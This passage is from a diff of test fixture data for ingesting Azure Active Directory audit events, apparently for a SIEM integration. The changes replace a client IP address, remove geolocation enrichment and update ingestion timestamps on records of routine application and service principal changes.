ccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4851,25 +4419,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4883,7 +4433,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5006,7 +4556,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5018,12 +4568,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036220300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124973800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5049,25 +4599,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5081,7 +4613,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5217,7 +4749,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5229,12 +4761,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036225500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124980600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service 